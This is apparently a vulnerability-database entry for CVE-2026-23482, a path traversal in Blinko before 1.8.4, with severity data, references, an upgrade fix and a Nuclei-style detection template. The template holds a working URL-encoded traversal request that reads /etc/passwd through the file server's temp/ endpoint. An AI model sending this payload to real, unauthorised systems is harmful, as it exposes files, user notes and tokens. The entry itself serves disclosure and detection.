
Blinko < 1.8.4 - Path Traversal

CVE-2026-23482
Verified

Description

Blinko < 1.8.4 contains a path traversal vulnerability caused by a lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files, including backup files containing user notes and tokens; exploitation requires no special privileges.

Severity

High

CVSS Score

7.5

Exploit Probability

20%

Affected Product

blinko

Published Date

April 27, 2026

Template Author

tx1ee

CVE-2026-23482.yaml
id: CVE-2026-23482

info:
  name: Blinko < 1.8.4 - Path Traversal
  author: tx1ee
  severity: high
  description: |
    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.
  impact: |
    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
  remediation: |
    Update to version 1.8.4 or later
  reference:
    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-23482
    cwe-id: CWE-22
    epss-score: 0.20459
    epss-percentile: 0.9563
  metadata:
    verified: true
    max-request: 1
    vendor: blinko-space
    product: blinko
    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
  tags: cve,cve2026,blinko,blinko-space,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/manifest.webmanifest"
      - "{{BaseURL}}/manifest.json"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "Blinko"
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009e9574b6edc56b0e488f3e40c1451afd2d7a0f85e0cf099d07f5e04d2b8bb07e022100cd104692fae7ca62ca6e4616d0373b92c88b0451d9baf8b39d31829d6a9ca244:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-23482
CWE ID: CWE-22

References

https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
https://nvd.nist.gov/vuln/detail/CVE-2026-23482

Remediation Steps

Update to version 1.8.4 or later